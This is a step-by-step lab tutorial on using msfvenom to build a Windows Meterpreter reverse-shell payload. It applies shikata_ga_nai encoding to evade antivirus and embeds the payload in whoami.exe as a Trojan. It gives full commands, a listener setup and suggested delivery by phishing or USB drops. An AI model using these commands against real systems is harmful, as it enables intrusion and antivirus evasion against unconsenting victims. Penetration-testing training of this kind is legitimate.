Encoding Payloads with MSFvenom

Mahran Al-Zyoud
|
30 steps

Power on the **Kali Linux** VM and log in to the desktop. Next, open the **Terminal** and use [[ip address]] command to determine the IP addresses on Kali Linux We will use this IP address in Step 4 to indicate the call-back address or localhost address when generating the custom payload.

The [[msfvenom --list payloads]] command is a feature of **msfvenom**, a tool in the **Metasploit** Framework that allows users to create and customize payloads. This specific command provides a comprehensive list of all payloads available within Metasploit, categorized based on the target platform and architecture. The command helps you: 1. **Discover Available Payloads**: Identify payloads suitable for your target system (e.g., Windows, Linux, macOS, etc.). 2. **Choose the Right Payload**: Determine which payload meets your exploitation or post-exploitation needs. 3. **Understand Compatibility**: Learn the categories and contexts in which specific payloads can be used.

The [[msfvenom --list formats]] command in **msfvenom** is used to display all the output formats available for payload generation. These formats dictate how the payload is encoded and packaged for execution on the target system. \ This command helps you: 1. **Identify Output Formats**: Learn the different file types or code formats in which you can generate payloads. 2. **Choose Compatible Formats**: Select a format suitable for the target environment or delivery mechanism (e.g., executable, script, raw shellcode). 3. **Customization**: Customize payloads to blend in with specific environments or bypass detection mechanisms.

Use the following command to generate a reverse shell payload: [[msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.168.22 LPORT=1234 -f exe -o payload1.exe]] Don't forget to replace 192.168.168.22 with the IP address of your Kali Linux VM. - \-p: to specify the payload (check Step 2). - LHOST: to specify the call-back address, such as the IP address of Kali Linux as the attacker machine. - LPORT: to specify the listening port on the attacker machine; this port needs to be open before executing the payload on the target system. - \-f: to specify the output format (check Step 3). - \-o: to specify the name of the output file. By default, the payload is stored within the present working directory; use the [[pwd ]]command to verify the current directory.

Next, open the web browser within Kali Linux, go to <https://www.virustotal.com>, and upload the newly generated payload to determine its **detection status**.

As shown below, 60 antimalware sensors from multiple vendors detected the custom payload as a potential threat. If we were to upload this custom payload to a target system that is running any of these antimalware programs, it would be immediately detected and deleted, hence preventing us from executing the payload to obtain a reverse shell.

Keep in mind that once you have submitted a file to VirusTotal and it has been\ flagged as malicious, the hash of the malicious file is also shared with other antivirus and security vendors within the industry. Therefore, the time to use your malicious payload is drastically reduced on your target.

Next, let’s apply encoding to the payload using the **shikata_ga_nai** encoding module and perform 20 iterations of the encoding to reduce the threat detection rating of the custom payload; use the following command: [[msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.168.22 LPORT=1234 -e x86/shikata_ga_nai -i 20 -f exe -o payload2.exe]] Don't forget to replace 192.168.168.22 with the IP address of your Kali Linux VM. The given command generates a **Windows Meterpreter reverse TCP payload** using **msfvenom** and applies encoding to make the payload harder to detect by security tools. - \-p: to specify the payload to generate (here, windows/meterpreter/reverse_tcp is a reverse shell that connects back to the attacker's machine) - LHOST: to specify the IP address of the attacker's machine to which the payload will connect. - LPORT: to specify the port on the attacker's machine to which the payload will connect. - \-e: to apply an encoder to the payload (here, the x86/shikata_ga_nai is used to obfuscate the payload, making it less likely to be detected by antivirus or intrusion detection systems. - \-i: to specify the number of iterations the encoder should run (each iteration adds another layer of obfuscation, increasing the difficulty for detection tools to recognize the payload) - \-f: to specify the output format of the payload (here, it will generate a Windows .exe file). - \-o: to save the generated payload to a file (here, it is named payload2.exe)

After the new payload is generated, upload it to VirusTotal to determine the threat detection, as shown below.

As shown below, while this new custom payload contains 20 iterations of encoding using the **x86/shikata_ga_nai** encode module, it was still detected by many antimalware sensors. However, the x86/shikata_ga_nai encoder module is mostly recommended when using **MSFvenom**.

Next, let’s generate another custom payload and embed it within an executable file, using the following command: [[msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.168.22 LPORT=1234 -x /usr/share/windows-binaries/whoami.exe -e x86/shikata_ga_nai -i 20 -f exe -o payload3.exe]] Don't forget to replace 192.168.168.22 with the IP address of your Kali Linux VM. The **-x** option in the given **msfvenom** command is used **to embed the malicious payload into an existing executable file** (also called "template injection"). This creates a **Trojan-like file** that retains the original functionality of the legitimate executable while embedding the malicious payload. The **whoami.exe** binary (a legitimate Windows executable located in /usr/share/windows-binaries/) is used. The generated payload (payload3.exe) will look and function like **whoami.exe**. When executed, it will: 1. Perform the original functionality of **whoami.exe** (printing the current username in the terminal). 2. Execute the embedded Meterpreter reverse TCP payload. Purpose of Using the **-x** Option: - **Camouflage**: The resulting file appears to be a legitimate program (whoami.exe), which might make users more likely to trust and execute it. - **Dual Functionality**: The Trojan maintains the functionality of the original executable while also delivering the malicious payload. - **Bypassing Detection**: Security solutions may focus on detecting standalone payloads, but embedding them in legitimate executables can make detection more challenging.

Example Workflow: 1. Choose a Legitimate Binary: select a binary (whoami.exe in this case) that is small, functional, and less likely to be flagged by antivirus software. Other common choices include tools like calc.exe or notepad.exe. 2. Generate the Trojan: run the above command to create payload3.exe. 3. Deploy the Trojan: deliver the file to the target (e.g., through phishing or USB drops). 4. Set Up a Listener: configure Metasploit to listen for the reverse connection [[msfconsole]]\ [[use exploit/multi/handler]]\ [[set payload windows/meterpreter/reverse_tcp]]\ [[set LHOST 192.168.168.22]]\ [[set LPORT 1234]]\ [[exploit]] 5. Trigger Execution: when the target executes payload3.exe, it will both run the original functionality of whoami.exe and connect back to the attacker's machine.

Next, upload the new payload to VirusTotal to determine the threat rating, as shown below.

As shown below, the payload3.exe file has a lower detection rating as\ compared to the previous custom payloads. It’s important to enumerate running services and applications on a targeted system to determine whether the host is running a specific antimalware solution, then test the payload in a lab environment to ensure it is working as expected before delivering to the target.